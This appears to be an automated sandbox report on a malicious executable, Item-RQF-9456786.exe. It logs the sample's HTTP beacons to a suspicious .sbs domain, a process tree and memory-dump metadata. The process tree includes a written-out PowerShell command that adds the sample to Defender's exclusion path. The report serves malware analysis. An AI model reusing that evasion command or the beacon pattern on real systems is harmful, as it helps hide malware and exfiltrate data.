                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rzt9uIbXS8%2BDuPqqeNXcUmct2f8cxML6dLJ2WpGJsvzry0gP%2Fuik%2BLbalOn2TzzxGK36pKPGR02D%2Brx6RXKEs5AnxfIXfbrOqhnGG38KExtAYkgExT87svrLNeHyzeNagjtxU2fHQJCO"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e1f7fedacf73aaf-DFW
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1073&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=738&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID:51
Source IP:192.168.2.5
Source Port:50033
Destination IP:188.114.96.3
Destination Port:80
PID:3160
Process:C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
Timestamp:Nov 13, 2024 15:37:28.225199938 CET
Bytes transferred:1755
Direction:OUT
Data:
POST /7arg/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.rtpwslot888gol.sbs
                                                                                  Origin: http://www.rtpwslot888gol.sbs
                                                                                  Referer: http://www.rtpwslot888gol.sbs/7arg/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
Timestamp:Nov 13, 2024 15:37:28.802875996 CET
Bytes transferred:1236
Direction:IN
Data:
HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:37:28 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pd2RvSQ%2FhDFu%2FxyV56mUce1wlGyxL1sc8xhrbRBLgYjS6RgigIGgfmd%2FV%2B2n8CHRVu9YAFir%2BAKaE5PxXhgFuiB%2BZ6%2FSwLrcmwhXm0xjj5Y2UDTxlvxUA%2Br2rJq6HWuQzjb0Bi82sjSR"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e1f7ffdfa6f6b58-DFW
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1247&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1755&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID:52
Source IP:192.168.2.5
Source Port:50034
Destination IP:188.114.96.3
Destination Port:80
PID:3160
Process:C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
Timestamp:Nov 13, 2024 15:37:31.157788038 CET
Bytes transferred:447
Direction:OUT
Data:
GET /7arg/?2J=yBRFulyn6SusKZ+jwFF1qQiDnRV1yVxCYcOxd6ADnBv0QCWFr3q/C42N2s59F8UA9Wb/HU1T/Yso8my7bN9/45XMMrsG9LzPDXPeB6BMAupShH8CXHTl1JaA/+QsUvuMTg==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.rtpwslot888gol.sbs
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
Timestamp:Nov 13, 2024 15:37:31.485524893 CET
Bytes transferred:1236
Direction:IN
Data:
HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:37:31 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eRAqe8CMFAAfoRpV%2BtW7L08y28JxosKx912g6j7MoFd5RGvZjFn%2BWNnhsz8WuMj5cA2aHzxMnXuYW9ypP99eA9IffOskZC%2F%2BnWtucv5tsYXriXVs1P9gF0XexJVuH6wcWgKQhP5Wq3kN"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e1f800ea877eb12-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1234&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=447&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                  Target ID:0
                                                                                  Start time:09:33:21
                                                                                  Start date:13/11/2024
                                                                                  Path:C:\Users\user\Desktop\Item-RQF-9456786.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\Item-RQF-9456786.exe"
                                                                                  Imagebase:0x430000
                                                                                  File size:726'016 bytes
                                                                                  MD5 hash:2980D8A9894FB28427F03922F74D1C76
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:09:33:22
                                                                                  Start date:13/11/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe"
                                                                                  Imagebase:0xe40000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:09:33:22
                                                                                  Start date:13/11/2024
                                                                                  Path:C:\Users\user\Desktop\Item-RQF-9456786.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\Item-RQF-9456786.exe"
                                                                                  Imagebase:0xc40000
                                                                                  File size:726'016 bytes
                                                                                  MD5 hash:2980D8A9894FB28427F03922F74D1C76
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:09:33:22
                                                                                  Start date:13/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6d64d0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:09:33:26
                                                                                  Start date:13/11/2024
                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                  Imagebase:0x7ff6ef0c0000
                                                                                  File size:496'640 bytes
                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:9
                                                                                  Start time:09:33:44
                                                                                  Start date:13/11/2024
                                                                                  Path:C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe"
                                                                                  Imagebase:0xf20000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:10
                                                                                  Start time:09:33:47
                                                                                  Start date:13/11/2024
                                                                                  Path:C:\Windows\SysWOW64\fontview.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\fontview.exe"
                                                                                  Imagebase:0xa30000
                                                                                  File size:113'152 bytes
                                                                                  MD5 hash:8324ECE6961ADBE6120CCE9E0BC05F76
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:11
                                                                                  Start time:09:33:59
                                                                                  Start date:13/11/2024
                                                                                  Path:C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe"
                                                                                  Imagebase:0xf20000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:12
                                                                                  Start time:09:34:10
                                                                                  Start date:13/11/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff79f9e0000
                                                                                  File size:676'768 bytes
                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                    Execution Graph

                                                                                    Execution Coverage:10.3%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:5%
                                                                                    Total number of Nodes:60
                                                                                    Total number of Limit Nodes:6
                                                                                    execution_graph: edge list omitted. APIs referenced in the graph: GetModuleHandleW, DuplicateHandle, CreateActCtxA, DrawTextExW, CreateIconFromResourceEx

                                                                                    Control-flow Graph: control_flow_graph 294, beginning at 76d11fc (graph not reproduced; legend: Executed / Not Executed)
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2291579180.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Hgq$Hgq$Hgq$Hgq$Hgq
                                                                                    • API String ID: 0-2022333140
                                                                                    • Opcode ID: bf9032d4ae284a1a077e1c1418a412f2f9835791557be60e2cb8c85b806abdf7
                                                                                    • Instruction ID: 93e4c117216a26baaf7db171f70ed0777161d9c6a957eb223da6d6bd311fba9e
                                                                                    • Opcode Fuzzy Hash: bf9032d4ae284a1a077e1c1418a412f2f9835791557be60e2cb8c85b806abdf7
                                                                                    • Instruction Fuzzy Hash: BA3283B0F10219CFDB54DFA9C8507AEBBF2AF89300F14856AD44AAB395DB349D41CB91

                                                                                    Control-flow Graph: control_flow_graph 485, beginning at 76d94f0 (graph not reproduced; legend: Executed / Not Executed)
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2291579180.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4'cq$:$pgq$~
                                                                                    • API String ID: 0-1276774758
                                                                                    • Opcode ID: 13a44cfdd5dbf1dee3d9835570e9572c2d7e3f6bb5a43b41eb758a24d1de0aa1
                                                                                    • Instruction ID: 7b4dd9844a31417878f8d442c0c87fd5a0ced8d6b7cb9614683a37ba2fa8c1db
                                                                                    • Opcode Fuzzy Hash: 13a44cfdd5dbf1dee3d9835570e9572c2d7e3f6bb5a43b41eb758a24d1de0aa1
                                                                                    • Instruction Fuzzy Hash: 8D42E0B5E10218DFDB15CFA9C980B99BBB2FF49304F1580E9E50AAB261D731AD91CF50

                                                                                    Control-flow Graph (legend: Executed, Not Executed)
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00B0B11E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270704129.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b00000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0

                                                                                    Control-flow Graph (legend: Executed, Not Executed)
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00B059C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270704129.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b00000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0

                                                                                    Control-flow Graph (legend: Executed, Not Executed)
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00B059C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270704129.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b00000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0

                                                                                    Control-flow Graph (legend: Executed, Not Executed)
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2291579180.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFromIconResource
                                                                                    • String ID:
                                                                                    • API String ID: 3668623891-0

                                                                                    Control-flow Graph (legend: Executed, Not Executed)
                                                                                    APIs
                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 076D27D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2291579180.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: DrawText
                                                                                    • String ID:
                                                                                    • API String ID: 2175133113-0

                                                                                    Control-flow Graph (legend: Executed, Not Executed)
                                                                                    APIs
                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 076D27D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2291579180.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: DrawText
                                                                                    • String ID:
                                                                                    • API String ID: 2175133113-0
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B0D76E,?,?,?,?,?), ref: 00B0D82F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270704129.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b00000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B0D76E,?,?,?,?,?), ref: 00B0D82F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270704129.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b00000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    APIs
                                                                                    • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,076D3F0A,?,?,?,?,?), ref: 076D3FAF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2291579180.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFromIconResource
                                                                                    • String ID:
                                                                                    • API String ID: 3668623891-0
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00B0B11E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270704129.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b00000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270556037.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_aad000_Item-RQF-9456786.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270592329.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_abd000_Item-RQF-9456786.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270556037.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_aad000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fbfc87c957cfac70801676b35423bbb52b8155174ba0ab9ece32df4be28db3e9
                                                                                    • Instruction ID: 44282d0805c262b2e4e9c5e8b6a3f6c436a7e9fa9a604574ae9f65bbe9801fb6
                                                                                    • Opcode Fuzzy Hash: fbfc87c957cfac70801676b35423bbb52b8155174ba0ab9ece32df4be28db3e9
                                                                                    • Instruction Fuzzy Hash: A90126714083409AE7248F29CDC4B67FFA8DF42320F28C91AED4A0F6C6D7399841CAB1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270556037.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_aad000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 434dbc8cfaca22f0aed9dd0126c2109a70b0c7696f4d331758f53d38fcd34941
                                                                                    • Instruction ID: ee13ceccdfd3ba15897aa87794bc8954a03292892366e2f405d7758d856a9333
                                                                                    • Opcode Fuzzy Hash: 434dbc8cfaca22f0aed9dd0126c2109a70b0c7696f4d331758f53d38fcd34941
                                                                                    • Instruction Fuzzy Hash: E0F0CD71404340AEE7248F1ACC88B62FFA8EF92334F18C45AED494F696C3799844CAB0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270704129.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b00000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 76dfe247c64f9a45f81b0ae5b81379da2b8e491288f2c8b9a2bbdfacdef361f9
                                                                                    • Instruction ID: fc27f1a4c16175aa68c07460d665f52efdd5743ffb9f68811d4f75f3ca2cfb31
                                                                                    • Opcode Fuzzy Hash: 76dfe247c64f9a45f81b0ae5b81379da2b8e491288f2c8b9a2bbdfacdef361f9
                                                                                    • Instruction Fuzzy Hash: 66A12B32B006168FCF15DFA4C4545AEBBF2FF84300B1585BAE905AB2A5EB71E955CB80

                                                                                    Execution Graph

                                                                                    Execution Coverage:1.3%
                                                                                    Dynamic/Decrypted Code Coverage:4.5%
                                                                                    Signature Coverage:7.1%
                                                                                    Total number of Nodes:154
                                                                                    Total number of Limit Nodes:15

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 312 417c23-417c4c call 42f893 315 417c52-417c60 call 42fe93 312->315 316 417c4e-417c51 312->316 319 417c70-417c81 call 42e333 315->319 320 417c62-417c6d call 430133 315->320 325 417c83-417c97 LdrLoadDll 319->325 326 417c9a-417c9d 319->326 320->319 325->326
                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2560619920.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: 328f7731dc45a0544d32d6300f712176fbe69daf62c9c17ae9a2f7434cffa9bc
                                                                                    • Instruction ID: d65416c8aa9de88eb01519d9064bc670331054a222807f9bdcbaeafa696c115c
                                                                                    • Opcode Fuzzy Hash: 328f7731dc45a0544d32d6300f712176fbe69daf62c9c17ae9a2f7434cffa9bc
                                                                                    • Instruction Fuzzy Hash: CB0121B5E0020DABDF10DBE5DC42FDEB3B89B54308F0081AAE91897241F635EB58CB95

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 337 42cbd3-42cc0c call 404a93 call 42de23 NtClose
                                                                                    APIs
                                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CC07
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2560619920.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: 4e38c00dae261bef75bf053dafa103ddf5257f9c4bce10d2ce9fad77e1b094bc
                                                                                    • Instruction ID: 19b43f975e338ed482916bce527e3acbfbee5e1e724ed158b75023e58981e8ca
                                                                                    • Opcode Fuzzy Hash: 4e38c00dae261bef75bf053dafa103ddf5257f9c4bce10d2ce9fad77e1b094bc
                                                                                    • Instruction Fuzzy Hash: 0FE04F722002147BC610EA5AEC45F9BB76CDBCA714F10441AFA1867141C674B90187B4

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 351 17e2b60-17e2b6c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                                                    • Instruction ID: 3d4a8ec41e7c5125418a31caa15521e9e0c31aded5a697a1c1e22df6d38b6ba9
                                                                                    • Opcode Fuzzy Hash: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                                                    • Instruction Fuzzy Hash: FB90026120640003460572584414617800AD7E1201B55C035E20145B0DC625CAA56226

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 353 17e2df0-17e2dfc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                                                    • Instruction ID: 74b6f3b3a86666f00cb9df0ec6169908ad52cb82c7ebdb690ff3d7a16a4c64a5
                                                                                    • Opcode Fuzzy Hash: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                                                    • Instruction Fuzzy Hash: BF90023120540413D611725845047074009D7D1241F95C426A1424578DD756CB66A222

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 352 17e2c70-17e2c7c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                                                    • Instruction ID: fc259d6c8cc1d04e0931c072ce0dc2f31e2177feab8edfe8dd191d80ce4db542
                                                                                    • Opcode Fuzzy Hash: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                                                    • Instruction Fuzzy Hash: 0690023120548802D6107258840474B4005D7D1301F59C425A5424678DC795CAA57222
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                                                    • Instruction ID: bc5051d7db882bb6646cb09198d71de92c57379df9630b1fc0031d5be351dbe0
